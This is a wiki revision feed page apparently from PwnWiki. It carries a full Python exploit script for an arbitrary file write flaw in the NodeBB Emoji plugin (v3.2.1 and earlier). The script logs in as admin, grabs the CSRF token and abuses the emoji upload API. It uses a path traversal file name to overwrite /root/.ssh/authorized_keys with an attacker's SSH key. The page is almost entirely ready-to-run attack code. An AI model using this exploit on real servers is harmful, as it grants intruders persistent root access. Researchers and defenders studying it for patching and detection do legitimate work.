https://pwnwiki.com/index.php?action=history&feed=atom&title=NodeBB_Plugin_Emoji_3.2.1_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%AF%AB%E5%85%A5%E6%BC%8F%E6%B4%9E
NodeBB Plugin Emoji 3.2.1 任意文件寫入漏洞 - Revision history
2026-04-07T22:17:29Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=NodeBB_Plugin_Emoji_3.2.1_%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%AF%AB%E5%85%A5%E6%BC%8F%E6%B4%9E&diff=1944&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write # Date: 2021-02-01 # Exploit Author: 1F98D # Software Link: https://nodebb.org/ # Version: Emoj..."
2021-04-30T00:56:58Z
<p>Created page with "==EXP== <pre> # Exploit Title: NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write # Date: 2021-02-01 # Exploit Author: 1F98D # Software Link: https://nodebb.org/ # Version: Emoj..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write<br />
# Date: 2021-02-01<br />
# Exploit Author: 1F98D<br />
# Software Link: https://nodebb.org/<br />
# Version: Emoji for NodeBB <= v3.2.1<br />
# Tested on: Ubuntu 18.04 (x86)<br />
# Software Link: https://github.com/NodeBB/nodebb-plugin-emoji<br />
#<br />
# The Emoji for NodeBB which is installed by default contains an<br />
# arbitrary file write vulnerability to insecurely handled user controlled<br />
# input.<br />
#<br />
# This exploit requires administrative access to the NodeBB instance in order<br />
# to access the emoji upload API.<br />
# <br />
#!/usr/bin/python3<br />
import requests<br />
import sys<br />
import re<br />
TARGET = 'http://192.168.1.1:4567'<br />
USERNAME = 'admin'<br />
PASSWORD = 'password'<br />
DESTINATION_FILE = '/root/.ssh/authorized_keys'<br />
SOURCE_FILE = '/home/kali/.ssh/id_rsa.pub'<br />
headers = { 'User-Agent': 'NotPython' }<br />
s = requests.Session()<br />
r = s.get('{}/login'.format(TARGET), headers=headers)<br />
if r.status_code != 200:<br />
print('[!] Error, {}/login unavailable'.format(TARGET))<br />
sys.exit(1)<br />
csrf = re.search('name="_csrf" value="(.+)?" />', r.text, re.IGNORECASE)<br />
if csrf is None:<br />
print('[!] Could not extract csrf token to proceed.')<br />
sys.exit(1)<br />
auth = {<br />
'username': USERNAME,<br />
'password': PASSWORD,<br />
'_csrf': csrf.group(1)<br />
}<br />
r = s.post('{}/login'.format(TARGET), headers=headers, data=auth)<br />
if r.status_code != 200:<br />
print('[!] Error, login failed')<br />
print('[!] Status: {}'.format(r.status_code))<br />
print('[!] Response: {}'.format(r.text))<br />
sys.exit(1)<br />
print('[+] Login successful')<br />
r = s.get('{}/admin/plugins/emoji'.format(TARGET), headers=headers)<br />
if r.status_code != 200:<br />
print('[!] Error, could not access emoji plugin')<br />
print('[!] Status: {}'.format(r.status_code))<br />
print('[!] Response: {}'.format(r.text))<br />
sys.exit(1)<br />
print('[+] Emoji plugin is installed')<br />
files = {<br />
'emojiImage': open(SOURCE_FILE)<br />
}<br />
data = {<br />
'fileName': '../../../../../../..{}'.format(DESTINATION_FILE)<br />
}<br />
r = s.post('{}/api/admin/plugins/emoji/upload'.format(TARGET), headers=headers, data=data, files=files)<br />
if r.status_code != 200:<br />
print('[!] Error, could not upload file')<br />
print('[!] Status: {}'.format(r.status_code))<br />
print('[!] Response: {}'.format(r.text))<br />
sys.exit(1)<br />
print('[+] Successfully uploaded file')<br />
<br />
</pre></div>
Pwnwiki